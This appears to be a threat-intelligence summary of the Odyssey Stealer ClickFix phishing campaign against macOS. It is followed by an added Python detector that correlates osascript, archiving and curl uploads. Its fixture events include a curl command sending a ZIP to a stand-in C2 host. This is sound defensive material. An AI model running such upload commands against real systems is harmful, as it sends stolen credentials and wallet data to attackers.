
Odyssey Stealer Malware Attacks macOS Users

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

A phishing campaign targeting macOS users employs the ClickFix technique to deliver the Odyssey Stealer malware. The attack uses a fake CAPTCHA verification page and executes without dropping a binary on the system. When users follow the page's instructions, they unknowingly execute a malicious AppleScript that collects sensitive data, including crypto wallet information, browser extensions, cookies, saved keychains, usernames, and passwords. The script creates a ZIP archive of the stolen data and exfiltrates it to a command and control server. This sophisticated attack blends phishing and social engineering to bypass traditional detection methods, making it challenging to detect and analyze.
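Because no binary is dropped, the chain described above (AppleScript run, ZIP creation, upload) is best hunted as process behaviour. The following added example is not part of the original report; the event fields, every command line in `EVENTS`, and the `find_chains` helper are constructed assumptions.

```python
import shlex

# Constructed process-execution events (ts in seconds). Field names and all
# command lines are assumptions for illustration, not data from the report.
EVENTS = [
    {"ts": 100, "pid": 500, "ppid": 410, "cmd": "osascript -e PLACEHOLDER_SCRIPT"},
    {"ts": 101, "pid": 501, "ppid": 500, "cmd": "sh -c PLACEHOLDER"},
    {"ts": 105, "pid": 502, "ppid": 501, "cmd": "ditto -c -k /tmp/example_dir /tmp/example.zip"},
    {"ts": 107, "pid": 503, "ppid": 501, "cmd": "curl -s -F file=@/tmp/example.zip https://c2.example.invalid/up"},
    {"ts": 200, "pid": 600, "ppid": 410, "cmd": "osascript -e PLACEHOLDER_NOTIFY"},
    {"ts": 201, "pid": 601, "ppid": 600, "cmd": "zip -r /tmp/backup.zip /tmp/docs"},
    {"ts": 300, "pid": 700, "ppid": 410, "cmd": "curl -F file=@/tmp/report.zip https://files.example.invalid/"},
]
UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "-d", "--data", "--data-binary"}

def _argv(cmd):
    try:
        return shlex.split(cmd)
    except ValueError:  # unbalanced quotes in telemetry: fall back to whitespace split
        return cmd.split()

def _stage(argv):
    """Classify one command as 'archive', 'upload' or None."""
    name = argv[0].rsplit("/", 1)[-1] if argv else ""
    if name == "zip" or (name == "ditto" and "-c" in argv and "-k" in argv):
        return "archive"
    if name == "curl" and UPLOAD_FLAGS.intersection(argv):
        return "upload"
    return None

def find_chains(events, window=300):
    """Return pids of osascript runs whose descendants archive, then upload, within `window` s."""
    root_of, stages, hits = {}, {}, []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        argv = _argv(e["cmd"])
        if argv and argv[0].rsplit("/", 1)[-1] == "osascript":
            root_of[e["pid"]], stages[e["pid"]] = (e["pid"], e["ts"]), []
            continue
        root = root_of.get(e["ppid"])
        if root is None or e["ts"] - root[1] > window:
            continue  # not under a tracked osascript run, or too late to correlate
        root_of[e["pid"]] = root  # descendant inherits its osascript ancestor
        stage, seen = _stage(argv), stages[root[0]]
        if stage == "archive" or (stage == "upload" and "archive" in seen):
            seen.append(stage)
        if "upload" in seen and root[0] not in hits:
            hits.append(root[0])
    return hits
```

The correlation ignores PID reuse and breaks if an intermediate process event is missing, so feed it complete telemetry for the hunt window.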

OPENCTI LABELS :

phishing, macos, credential theft, clickfix, applescript, odyssey stealer, crypto wallet


Open in NetmanageIT OpenCTI Public Instance with below link!


NOTE: Use the public read-only user credentials shown on the login page banner.

